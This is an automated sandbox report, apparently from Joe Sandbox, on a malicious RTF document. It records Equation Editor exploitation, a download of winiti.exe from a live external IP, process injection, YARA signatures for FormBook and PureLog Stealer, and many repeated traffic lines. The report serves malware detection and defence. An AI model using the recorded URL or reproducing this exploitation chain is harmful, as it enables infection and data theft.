Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YjYoFznWQI.rtf

Overview

General Information

Sample name:YjYoFznWQI.rtf
renamed because original name is a hash value
Original sample name:d559f074ac2f858891395b2d39d93e8e.rtf
Analysis ID:1485301
MD5:d559f074ac2f858891395b2d39d93e8e
SHA1:04297240c45fce910112cadbdce42538a1b58889
SHA256:731274dfb1a00b9694101c7488bdfa2c9bba0588f75b09a8ade4e6c6f86fbcdd
Tags:rtf
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1764 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 2432 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • winiti.exe (PID: 2840 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 002C833FF6ECAAC50C4EF23B36189BBC)
        • winiti.exe (PID: 1580 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 002C833FF6ECAAC50C4EF23B36189BBC)
        • winiti.exe (PID: 2592 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 002C833FF6ECAAC50C4EF23B36189BBC)
        • winiti.exe (PID: 2464 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 002C833FF6ECAAC50C4EF23B36189BBC)
        • winiti.exe (PID: 1812 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 002C833FF6ECAAC50C4EF23B36189BBC)
    • EQNEDT32.EXE (PID: 2708 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
YjYoFznWQI.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x666:$obj1: \objhtml
  • 0x6a1:$obj2: \objdata
  • 0x68b:$obj3: \objupdate
SourceRuleDescriptionAuthorStrings
00000009.00000002.411080065.0000000000080000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.411080065.0000000000080000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b380:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13faf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.372607440.0000000000460000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000009.00000002.411140911.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.411140911.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2e813:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x17442:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        5.2.winiti.exe.460000.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          5.2.winiti.exe.460000.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            5.2.winiti.exe.21938ac.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              9.2.winiti.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                9.2.winiti.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
                • 0x2da13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
                • 0x16642:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
                Click to see the 3 entries

                Exploits

                barindex
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.219.239.104, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2432, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2432, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe

                System Summary

                barindex
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2432, Protocol: tcp, SourceIp: 104.219.239.104, SourceIsIpv6: false, SourcePort: 80
                Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2432, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 2840, ProcessName: winiti.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2432, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 2840, ProcessName: winiti.exe
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2432, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1764, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                No Snort rule has matched
                Timestamp:2024-07-31T13:22:05.091868+0200
                SID:2022051
                Source Port:80
                Destination Port:49163
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-31T13:22:04.936766+0200
                SID:2022050
                Source Port:80
                Destination Port:49163
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: YjYoFznWQI.rtfAvira: detected
                Source: http://104.219.239.104/15/winiti.exeAvira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exeReversingLabs: Detection: 28%
                Source: C:\Users\user\AppData\Roaming\winiti.exeReversingLabs: Detection: 28%
                Source: YjYoFznWQI.rtfReversingLabs: Detection: 50%
                Source: YjYoFznWQI.rtfVirustotal: Detection: 55%Perma Link
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.411080065.0000000000080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.411140911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Roaming\winiti.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exeJoe Sandbox ML: detected

                Exploits

                barindex
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.219.239.104 Port: 80Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: jqAx.pdbSHA256c source: winiti.exe.2.dr, winiti[1].exe.2.dr
                Source: Binary string: jqAx.pdb source: winiti.exe.2.dr, winiti[1].exe.2.dr
                Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 00000009.00000002.411240507.00000000009A0000.00000040.00001000.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 4x nop then jmp 00681E6Eh5_2_006815DF
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
